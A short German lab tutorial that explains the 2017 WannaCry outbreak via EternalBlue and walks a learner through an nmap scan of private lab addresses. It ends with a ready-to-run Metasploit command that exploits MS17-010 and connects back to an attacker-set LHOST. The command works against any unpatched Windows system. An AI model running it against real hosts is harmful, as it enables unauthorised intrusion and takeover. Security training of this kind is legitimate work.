Im Jahr 2017 führte die Sicherheitslücke EternalBlue in einem Netzwerkprotokoll für Datei- und Druckerfreigaben (SMBv1-Protokoll) dazu, dass die Ransomware WannaCry weltweit ungepatchte Systeme angreifen konnte. Ungepatchte Systeme sind Systeme, bei denen keine regelmäßigen Sicherheitsupdates durchgeführt werden. Innerhalb weniger Stunden wurden Millionen Computer infiziert, Daten verschlüsselt und Lösegeldforderungen gestellt.
Durch detaillierte Netzwerkscans können Sicherheitslücken dieser Art wie EternalBlue entdeckt werden. Diese Schwachstellen können von Angreifern ausgenutzt werden, um sich Zugriff zum System zu verschaffen. Durch regelmäßige Sicherheitsupdates kann dies verhindert werden.
Führe einen erweiterten Netzwerkscan durch, um herauszufinden, welche Geräte im Netzwerk erreichbar sind. Dabei kommen erweiterte Scan-Parameter
zum Einsatz (z.B. -A -sS -sV -O), um neben offenen Ports auch Betriebssystemdetails, Versionsinformationen und Sicherheitslücken wie CVE-2017-0144 zu erkennen.
Hinweis: Der Einsatz von nmap auf fremden IP-Adressen ohne Genehmigung ist illegal.
LHOST=192.168.1.100
Ziel IP-Adresse 1=192.168.1.10
Ziel IP-Adresse 2=192.168.1.20
Jetzt greifen wir das anfällige System an. Gib den folgenden Befehl ein und ersetze [RHOST] mit der IP des angreifbaren Systems:
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set LHOST 192.168.1.100; set RHOST [RHOST]; run"